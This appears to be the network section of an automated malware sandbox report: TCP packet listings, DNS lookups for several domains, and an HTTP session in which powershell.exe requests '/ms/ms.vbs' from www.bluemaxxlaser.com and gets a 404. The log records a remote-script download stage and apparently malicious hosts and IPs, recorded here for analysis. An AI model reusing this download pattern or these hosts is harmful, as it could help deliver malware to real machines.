                                                                Dec 19, 2024 11:56:24.769675970 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.769757032 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.769812107 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.769836903 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.784897089 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.784980059 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.784998894 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.785015106 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.785059929 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.785059929 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.803836107 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.803884983 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.803963900 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.803981066 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.804011106 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.804045916 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.819334030 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.819401026 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.819602013 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.819619894 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.819695950 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.837204933 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.837270975 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.837301016 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.837327003 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.837354898 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.837378979 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.928555965 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.928622961 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.928778887 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.928778887 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.928802013 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.928930998 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.942373991 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.942419052 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.942471981 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.942487955 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.942514896 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.942610025 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.953517914 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.953550100 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.953650951 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.953669071 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.953835011 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.965715885 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.965737104 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.965809107 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.965828896 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.965858936 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.965883017 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.977356911 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.977401972 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.977466106 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.977479935 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.977508068 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.977524996 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.984319925 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.984375000 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.984436035 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.984451056 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.984482050 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.984503031 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.991029978 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.991072893 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.991121054 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.991137028 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.991167068 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.991187096 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.996896029 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.996939898 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.996984005 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.996999025 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:24.997025967 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:24.997061014 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.122344017 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.122400999 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.122590065 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.122590065 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.122626066 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.122723103 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.129076004 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.129142046 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.129286051 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.129302979 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.129362106 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.135725975 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.135768890 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.135823011 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.135837078 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.135865927 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.135890007 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.141446114 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.141508102 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.141551018 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.141565084 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.141591072 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.141622066 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.148137093 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.148154974 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.148242950 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.148258924 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.148313046 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.154400110 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.154423952 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.154479980 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.154495955 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.154520988 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.154577017 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.161204100 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.161231995 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.161308050 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.161324024 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.161376953 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.167650938 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.167674065 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.167757034 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.167772055 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.167824984 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.315098047 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.315123081 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.315216064 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.315249920 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.315274000 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.316706896 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.320853949 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.320878029 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.320946932 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.320964098 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.321017027 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.327636957 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.327658892 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.327755928 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.327775955 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.327811003 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.328692913 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.334069967 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.334093094 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.334161043 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.334176064 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.334220886 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.340045929 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.340065956 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.340159893 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.340174913 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.340219975 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.347060919 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.347084045 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.347182989 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.347199917 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.347251892 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.352917910 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.352940083 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.353127003 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.353142977 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.353203058 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.359601021 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.359621048 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.359678030 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.359687090 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.359719992 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.359738111 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.507296085 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.507335901 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.507510900 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.507545948 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.507698059 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.512996912 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.513024092 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.513092041 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.513108969 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.513135910 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.513161898 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.519670010 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.519690037 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.519767046 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.519783974 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.519829988 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.526345968 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.526366949 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.526446104 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.526454926 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.526500940 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.532215118 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.532238007 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.532316923 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.532326937 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.532373905 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.539227009 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.539249897 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.539309978 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.539330006 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.539355993 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.539369106 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.545038939 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.545061111 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.545129061 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.545142889 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.545203924 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.552287102 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.552320957 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.552421093 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.552438021 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.552515030 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.698951006 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.698983908 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.699166059 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.699215889 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.699265003 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.705487013 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.705507040 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.705621958 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.705677032 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.705728054 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.712248087 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.712270975 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.712395906 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.712430954 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.712486029 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.718022108 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.718044043 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.718132973 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.718149900 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.718199968 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.724666119 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.724688053 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.724808931 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.724826097 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.724883080 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.730998993 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.731020927 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.731093884 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.731112003 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.731137991 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.731157064 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.736984968 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.737685919 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.737706900 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.737761021 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.737776995 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.737811089 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.737837076 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.744848967 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.744869947 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.744935036 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.744951010 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.745006084 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.745006084 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.745687962 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.745747089 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.745760918 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.745785952 CET44349706107.161.23.150192.168.2.8
                                                                Dec 19, 2024 11:56:25.745819092 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.745846033 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:25.751872063 CET49706443192.168.2.8107.161.23.150
                                                                Dec 19, 2024 11:56:26.322279930 CET4970780192.168.2.8203.175.174.69
                                                                Dec 19, 2024 11:56:26.441842079 CET8049707203.175.174.69192.168.2.8
                                                                Dec 19, 2024 11:56:26.441945076 CET4970780192.168.2.8203.175.174.69
                                                                Dec 19, 2024 11:56:26.447438002 CET4970780192.168.2.8203.175.174.69
                                                                Dec 19, 2024 11:56:26.566900969 CET8049707203.175.174.69192.168.2.8
                                                                Dec 19, 2024 11:56:27.975078106 CET8049707203.175.174.69192.168.2.8
                                                                Dec 19, 2024 11:56:28.026758909 CET4970780192.168.2.8203.175.174.69
                                                                Dec 19, 2024 11:56:29.617435932 CET4970780192.168.2.8203.175.174.69
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 19, 2024 11:56:18.953103065 CET4967753192.168.2.81.1.1.1
                                                                Dec 19, 2024 11:56:19.090718031 CET53496771.1.1.1192.168.2.8
                                                                Dec 19, 2024 11:56:22.320184946 CET5527053192.168.2.81.1.1.1
                                                                Dec 19, 2024 11:56:22.458209038 CET53552701.1.1.1192.168.2.8
                                                                Dec 19, 2024 11:56:26.181711912 CET5587453192.168.2.81.1.1.1
                                                                Dec 19, 2024 11:56:26.318969011 CET53558741.1.1.1192.168.2.8
                                                                Dec 19, 2024 11:56:38.015619993 CET5057453192.168.2.81.1.1.1
                                                                Dec 19, 2024 11:56:52.377695084 CET5674453192.168.2.81.1.1.1
                                                                Dec 19, 2024 11:57:05.643856049 CET5046653192.168.2.81.1.1.1
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 19, 2024 11:56:18.953103065 CET192.168.2.81.1.1.10x1cb1Standard query (0)www.al-rasikh.comA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:22.320184946 CET192.168.2.81.1.1.10x3a67Standard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:26.181711912 CET192.168.2.81.1.1.10x66b4Standard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:38.015619993 CET192.168.2.81.1.1.10xaeb3Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:52.377695084 CET192.168.2.81.1.1.10xd5d1Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:57:05.643856049 CET192.168.2.81.1.1.10xb86fStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 19, 2024 11:56:19.090718031 CET1.1.1.1192.168.2.80x1cb1No error (0)www.al-rasikh.comal-rasikh.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:56:19.090718031 CET1.1.1.1192.168.2.80x1cb1No error (0)al-rasikh.com107.161.23.150A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:22.458209038 CET1.1.1.1192.168.2.80x3a67No error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:56:22.458209038 CET1.1.1.1192.168.2.80x3a67No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:26.318969011 CET1.1.1.1192.168.2.80x66b4No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:35.304498911 CET1.1.1.1192.168.2.80xe20eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:35.304498911 CET1.1.1.1192.168.2.80xe20eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:56:38.160485029 CET1.1.1.1192.168.2.80xaeb3No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:56:52.517422915 CET1.1.1.1192.168.2.80xd5d1No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:57:05.781162977 CET1.1.1.1192.168.2.80xb86fNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.56.102A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                Dec 19, 2024 11:57:39.774466991 CET1.1.1.1192.168.2.80xbf63No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.24A (IP address)IN (0x0001)false
                                                                • www.al-rasikh.com
                                                                • www.astenterprises.com.pk
                                                                • www.bluemaxxlaser.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.849707203.175.174.69803020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 19, 2024 11:56:26.447438002 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                Host: www.bluemaxxlaser.com
                                                                Connection: Keep-Alive
                                                                Dec 19, 2024 11:56:27.975078106 CET516INHTTP/1.1 404 Not Found
                                                                Date: Thu, 19 Dec 2024 10:56:27 GMT
                                                                Server: Apache
                                                                Content-Length: 315
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=iso-8859-1
